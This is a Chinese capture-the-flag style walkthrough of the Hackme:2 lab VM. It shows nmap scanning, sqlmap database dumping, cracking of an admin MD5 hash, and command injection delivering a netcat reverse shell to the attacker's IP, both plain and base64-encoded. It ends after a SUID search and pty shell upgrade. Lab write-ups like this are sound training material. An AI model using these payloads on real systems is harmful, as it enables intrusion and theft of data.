Hackme:2靶机渗透练习 – 作者:compactdisk

Hackme:2靶机渗透练习

网络结构：

环境搭建平台为VMware15，网络为nat模式，网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip：192.168.1.142

kali linux ip：192.168.1.137

信息收集：

主机发现：

nmap -sP 192.168.1.0/24

如下图，图中192.168.1.1为VMnet8网卡地址，1.3为网关地址，1.137为kali地址，因此判断目标靶机地址为192.168.1.142

端口服务扫描：

nmap -p 1-65535 -A 192.168.1.142 -sV -T4

目标主机开启了22端口ssh服务，以及80端口http服务

目录及页面爆破：

dirb爆破目录：

只得到了一个uploads目录

同时dirbuster使用其他字典一起爆破，看能不能得到更多结果：

也是并没有发现新目录

目录爆破并没有发现啥可疑的页面、目录，看来只能访问web页面，从网站本身找突破口了

漏洞挖掘：

直接访问dirbuster爆破出的任意目录，基本都会跳转到登录界面，那我们就先注册一个新用户，登录看看

登录之后是一个查询书籍的页面，看来这里是与数据库交互了

很自然的能够想到sql注入，sqlmap跑一下，需要先burp抓个包，拿一下cookie，而且是post传参，需要看下参数之类的信息，这里不再放图，直接到注入阶段

先看下数据库

sqlmap -u http://192.168.1.142/welcome.php --data "search=1" --dbs --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke" --tamper space2comment.py --level 3 --risk 3

可以看到有一个webapphacking库

查一下里面的表

sqlmap -u http://192.168.1.142/welcome.php --data "search=Linux" --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke"  --level=3 --risk=3 --tamper=space2comment --tables -D 'webapphacking'

在注入结果中可以看到，有一个user表和一个books表，很显然books表里应该就是我们刚刚可以查询的图书信息，users表不言而喻

不再挨个表查询，直接脱库

sqlmap -u http://192.168.1.142/welcome.php --data "search=Linux" --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke"  --level=3 --risk=3 --tamper=space2comment --dump-all -D 'webapphacking'

可以看到users表里有一个superadmin用户

将密码2386acb2cf356944177746fc92523983，md5解密，得到明文Uncrackable

然后在登录页面，使用此账户名密码登录

登录之后可以看到一个图片上传和两个通过姓、名查询用户的查询框，上传功能在后端对后缀名进行了过滤，无法上传后缀名中带有php的文件，上传图片马后，之前我们使用dirb爆破目录时看到的那个uploads目录并不是上传文件的存放目录，怀疑是另外有地方存放，且我们此处图片马后缀名png，无法正常解析，此路不通

再看下面的查询输入框，用burp的intruder简单测试一下是否存在注入，选用了模糊-完整的payload

可以看到，这里‘id’参数的响应是200的，且返回来了用户信息，此处存在命令注入

使用ststem()函数测试，也是成功返回了我们想要的信息

制作反弹shell：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.137 4444 > /tmp/f

这里直接使用system函数包裹此命令注入的话会反弹失败，需要转base64编码

system(base64_decode('cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC

4xLjEzNyA0NDQ0ID4gL3RtcC9m'))
//这里因为freebuf检测c4居然是敏感词，不能连在一起，所以空出一行，实际使用时把中间那行去掉

kali监听4444端口

web页面点击search发送参数，反弹成功，拿到一个低权限的web shell

权限提升：

首先查看一下设置了suid的文件、命令

ls -lh $(find / -perm -u=s -type f 2>/dev/null)

可以看到这个touchmenot文件自己在/home目录下，格外的扎眼，而且子目录名为legacy，百度对这个词的解释为传统BIOS传输模式启动顺序：开机→BIOS初始化→BIOS自检→引导操作系统→进入系统

cd到这个目录下，运行此文件，长时间不响应

怀疑是shell的问题，这里先获取一个交互shell

python -c "import pty;pty.spawn('/bin/bash');"

来源：freebuf.com 2021-02-22 11:40:34 by: compactdisk